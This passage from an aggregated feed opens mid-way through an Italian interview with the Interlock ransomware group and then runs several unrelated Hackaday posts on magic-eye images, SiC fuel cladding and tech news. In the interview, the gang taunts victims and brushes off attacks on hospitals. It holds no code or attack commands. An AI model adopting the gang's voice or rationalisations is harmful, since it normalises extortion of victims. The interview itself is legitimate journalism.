Interlock: Non ci sono state difficoltà con FreeBSD. Avevamo un obiettivo e lo abbiamo raggiunto.

9 – RHC: Quali vulnerabilità o errori di configurazione riscontrate più frequentemente nei vostri obiettivi? Ci sono delle tendenze comuni che avete osservato nelle infrastrutture aziendali compromesse?
Interlock: La tendenza principale è il fattore umano. Vediamo la frustrazione consumare gli amministratori di rete al lavoro, fanno tutto tranne il loro lavoro. Pornografia, shopping online senza fine, servizi di intrattenimento e social media dominano il loro tempo.

11 – RHC: Come valutate l’efficacia delle attuali difese di sicurezza informatica adottate dalle aziende? Esistono soluzioni o pratiche che, secondo voi, renderebbero i sistemi più sicuri contro attacchi come il vostro?
Interlock: Le misure di sicurezza stanno migliorando, il che è entusiasmante, è una nuova sfida per noi. Sebbene esistano metodi per complicare gli attacchi, le reti completamente sicure sono un’utopia. I rischi possono essere ridotti, ma non eliminati del tutto.

12 – RHC: Se dovessi dare un consiglio a un’azienda che non ha ancora un programma di sicurezza informatica in atto, quale sarebbe la prima cosa da fare?
Interlock: pensa attentamente, poi fai una scelta, non il contrario.

13 – RHC: Nel secondo trimestre del 2024, gli attacchi ransomware sono cresciuti in modo significativo, lo segnalate anche sul vostro sito. Cosa pensate di questa tendenza? Pensate che potremmo raggiungere un punto di saturazione o di “equilibrio”, in cui le aziende adotteranno difese che renderanno attacchi come il vostro meno efficaci?
Interlock: Apsis arriverà sempre, e poi inizierà un nuovo gioco con nuove regole e nuovi giocatori.

14 – RHC: Il vostro manifesto ci ha stupiti per la comunicazione. Parla di “lezioni che le aziende non dimenticheranno”. Avete mai osservato aziende o individui imparare effettivamente lezioni dai vostri attacchi? Come vi sentiresti se le aziende migliorassero drasticamente le loro difese?
Interlock: Quasi tutte le aziende rafforzano le loro difese dopo averci incontrato. Tuttavia, alcune non riescono a imparare la lezione e continuano a usare metodi obsoleti. Questo non dura a lungo.

15 – RHC: Molti ransomware hanno colpito anche istituzioni pubbliche, ospedali e settori critici, causando danni a persone innocenti. Come scegliete le vostre vittime e cosa dire dei danni collaterali che possono colpire persone esterne all’azienda? Avete policy interne che proibiscono obiettivi specifici?
Interlock: Paradossalmente, sistemi critici come istituzioni pubbliche e ospedali hanno spesso una protezione minima. Questa mancanza di investimenti in sicurezza evidenzia la necessità di dare priorità alla loro difesa.

16 – RHC: L’intelligenza artificiale è sempre più integrata nella sicurezza informatica. Cosa pensate dei tentativi di usare l’intelligenza artificiale per anticipare, prevenire e mitigare attacchi come il vostro? Ci sono contromisure particolari che intendete adottare in risposta a questa tecnologia?
Interlock: L’intelligenza artificiale cambia il campo di gioco. Ci divertiamo con questo gioco e ci evolviamo per contrastarlo.

17 – RHC: Siete d’accordo con l’affermazione “se usi un computer ma non ti sforzi di proteggerlo (e quindi non conosci lo strumento), non meriti di usarlo”?
Interlock: Dimentica le restrizioni che tutti dovrebbero avere quando usano i computer. Gli errori capitano a tutti.

18 – RHC: Sul vostro DLS si evince una certa sensibilità nell’area della sicurezza informatica. Sebbene le vostre azioni possano essere giudicate solo in base alle statistiche sulla criminalità, cosa vi ha realmente motivato a entrare in quest’area escludendo il denaro?
Interlock: denaro + informazioni, cosa potrebbe essere meglio?

19 – RHC: Vi siete mai offerti a spiegare a una vittima i difetti che avete sfruttato e come risolverli per evitare attacchi futuri?
Interlock: No, non l’abbiamo fatto.

20 – RHC: Qual è secondo voi la vera motivazione per cui lo stato dell’arte nel mondo della sicurezza informatica è scarso nonostante gli investimenti (sia finanziari che di altro tipo) nel settore? Pensate che ci sia solo molta apparenza e poca sostanza?
Interlock: La sicurezza informatica rimane scarsa perché gli sforzi si concentrano su misure reattive, strumenti appariscenti e di conformità invece di affrontare questioni fondamentali come talento, implementazione e basi di sicurezza.

22 – RHC: Qual è la configurazione errata/vulnerabilità più stupida che avete trovato sulle reti delle vittime?
Interlock: l’amministratore di dominio di un’azienda globale ha utilizzato un singolo spazio come password.

23 – RHC: Cosa diresti a qualcuno che ti dicesse che dovresti contribuire a rendere sicure le reti invece di abusarne solo per motivi economici?
Interlock: “Stiamo già contribuendo a renderle più sicure. Dagli tempo e te ne accorgerai tu stesso.”

24 – RHC: Qual è il primo suggerimento che daresti a qualcuno che vuole iniziare a mettere su ub nuovo RaaS? In base alla vostra esperienza, quali sono stati gli aspetti più difficili e quelli più facili?
Interlock: Valuta i rischi e se sei pronto ad accettarli, ti auguriamo buona fortuna. L’impossibile è possibile.

25 – RHC: Ultimamente, le intelligence e le agenzie governative hanno condotto diverse campagne per distruggere le risorse digitali delle operazioni di criminalità informatica. Quali sono le vostre considerazioni a riguardo? Vi preoccupa?
Interlock: Sì, siamo preoccupati quando i poliziotti sono alle nostre spalle, ma non gli voltiamo mai le spalle.

26 – RHC: Infine, se poteste inviare un messaggio alle aziende che considerate “negligenti” e che sottovalutano il valore dei dati, quale sarebbe il tuo consiglio? Cosa dovrebbero cambiare oggi per evitare di essere bersagli futuri?
Interlock: Non sprecare energie e tempo. Lo faremo noi per te. 😉

27 – RHC: Grazie mille ragazzi per l’intervista. Facciamo queste interviste per far capire ai nostri lettori che la sicurezza informatica è un argomento puramente tecnico e che per poter vincere la lotta contro la criminalità informatica dobbiamo essere più forti di voi, che siete noti per essere spesso un passo avanti a tutti. C’è qualcosa che vorreste dire ai nostri lettori o alle potenziali vittime delle vostre operazioni?
Interlock: La sicurezza informatica è uno sforzo di squadra. Mentre i Black Hat sono spesso un passo avanti, restare vigili, usare password complesse e mantenere il software aggiornato può fare un’enorme differenza.

L'articolo RHC DarkLab Intervista Interlock Ransomware. “Non sprecare energie e tempo. Lo faremo noi per te!” proviene da il blog della sicurezza informatica.

Ah, the 1990s. It was a simpler time, when the web was going to be democratic and decentralised, you could connect your Windows 95 PC to the internet without worrying much about it being compromised, and freely download those rave music MP3s. Perhaps you had a Global Hypercolor T-shirt and spent a summer looking like the sweaty idiot you were, and it’s certain you desperately squinted at a magic eye image in a newspaper (remember newspapers?) trying to see the elephant or whatever it was. If you’d like to relive that experience, then [Dave Richeson] has a magic eye image generator for Microsoft Excel.

Unfortunately a proportion of the population including your scribe lack the ability to see these images, a seemingly noise-like pattern of dots on the page computationally generated to fool the visual processing portion of your brain to generate a 3D image. The Excel sheet allows you to create the images, but perhaps most interesting is the explanation of the phenomenon and mathematics which go along with it. Along with a set of test images depicting mathematical subjects, it’s definitely worth a look.

You can download a template and follow the instructions, and from very limited testing here we can see that LibreOffice doesn’t turn its nose up at it, either. Give it a go, and learn afresh the annoyance of trying to unfocus your eyes.

hackaday.com/2024/12/08/magic-…

Since the construction of the first commercial light water nuclear power plants (LWR) the design of their fuel rods hasn’t changed significantly. Mechanically robust and corrosion-resistant zirconium alloy (zircalloy) tubes are filled with ceramic fuel pellets, which get assembled into fuel assemblies for loading into the reactor.
A 12′ SiGa fuel assembly, demonstrating the ability to scale to full-sized fuel rods. (Credit: DoE)
Now it seems that silicon carbide (SiC) may soon replace the traditional zirconium alloy with General Atomics’ SiGa fuel cladding, which has been tested over the past 120 days in the Advanced Test Reactor at Idaho National Laboratory (INL). This completes the first of a series of tests before SiGa is approved for commercial use.

One of the main advantages of SiC over zircalloy is better resistance to high temperatures — during testing with temperatures well above those experienced with normal operating conditions, the zircalloy rods would burst while the SiC ones remained intact (as in the embedded video). Although normally SiC is quite brittle and unsuitable for such structures, SiGa uses SiC fibers, which allows it to be used in this structural fashion.

Although this development is primarily part of the Department of Energy’s Accident Tolerant Fuel Program and its focus on melt-down proof fuel, the switch to SiC could also solve a major issue with zirconium, being its use as a catalyst with hydrogen formation when exposed to steam. Although with e.g. Fukushima Daiichi’s triple meltdown the zircalloy fuel rods were partially destroyed, it was the formation of hydrogen gas inside the reactor vessels and the hydrogen explosions during venting which worsened what should have been a simple meltdown into something significantly worse.

youtube.com/embed/x7DvtG3tlhE?…

hackaday.com/2024/12/08/silico…

For some reason, we never tire of stories highlighting critical infrastructure that’s running outdated software, and all the better if it’s running on outdated hardware. So when we learned that part of the San Francisco transit system still runs on 5-1/4″ floppies, we sat up and took notice. The article is a bit stingy with the technical details, but the gist is that the Automatic Train Control System was installed in the Market Street subway station in 1998 and uses three floppy drives to load DOS and the associated custom software. If memory serves, MS-DOS as a standalone OS was pretty much done by about 1995 — Windows 95, right? — so the system was either obsolete before it was even installed, or the 1998 instance was an upgrade of an earlier system. Either way, the San Francisco Municipal Transportation Agency (SFMTA) says that the 1998 system due to be replaced originally had a 25-year lifespan, so they’re more or less on schedule. Replacement won’t be cheap, though; Hitachi Rail, the same outfit that builds systems that control things like the bullet train in Japan, is doing the job for the low, low price of $212 million.

We don’t know who needs to here this, but we got a tip from Clem Mayer about upcoming changes to EU regulations that might affect the maker community. It concerns the General Product Safety Regulations, or GPSR, which appears to be an extension of current rules that will impose additional compliance burdens on anyone selling products to the EU market on online marketplaces. We won’t pretend to know the intricacies of GPSR, or even the basics, but Smander.com has a brief summary of the rules and how best to comply, which seems to amount to retaining the services of a company to take care of the compliance paperwork. We also took a look at the official EU information page for GPSR, which is pretty thin on information but at least it’s a primary source. If you’re selling kits or other products into the EU market, chances are good that you’re going to need to figure this out, and soon — seems like the rules go into effect December 13th.

You’ve got to feel for the authors of open-source software. As if developing, maintaining, and supporting the software that keeps the Internet running wasn’t a thankless enough job, you can actually get doxxed by your own creation. A case in point is Daniel Stenberg, the original author and lead developer on curl and libcurl. His name and email address are often found in the documentation for products using his software, so frustrated users who find his contact information tend to reach out to him after being ignored by the product’s support team. It seems annoying, and we sympathize with Daniel and others like him, but then again, it’s a measure of your impact that your contact information is literally everywhere.

If you’re in the market for a unique gift for the geek in your life and have an extra $230 to spread around, check out this custom Lego kit of the ASML TWINSCAN EXE:500 extreme UV lithography machine. Actually, strike that; now that we look at the specs, this kit is tiny. It’s only 851 pieces and 13.9″ (35 cm) wide when assembled, and isn’t exactly a richly detailed piece. Sure, Lego kits are fun, but there seem to be much better choices out there; we had a blast putting together the Apollo 11 Lunar Module Eagle kit a few years back, and that was only about $70.

And finally, Festo fans will want to check out this literal air guitar from the automation company’s “Experience Center” in Lupfig, Switzerland. Festo engineers bedazzled an acoustic guitar with pneumatic cylinders and control valves and programmed the system to pluck out the intro riff from AC/DC’s “Thunderstruck.” It’s actually pretty good, and we especially appreciate the pneumatic party whistle that chips in from time to time. There’s a missed opportunity here, though; we really expected a pneumatic cylinder to do the characteristic double rap on the body of the guitar when you get to the “Thun-der!” part. Too bad — maybe for version two.

youtube.com/embed/Oatc1QpXyQc?…

hackaday.com/2024/12/08/hackad…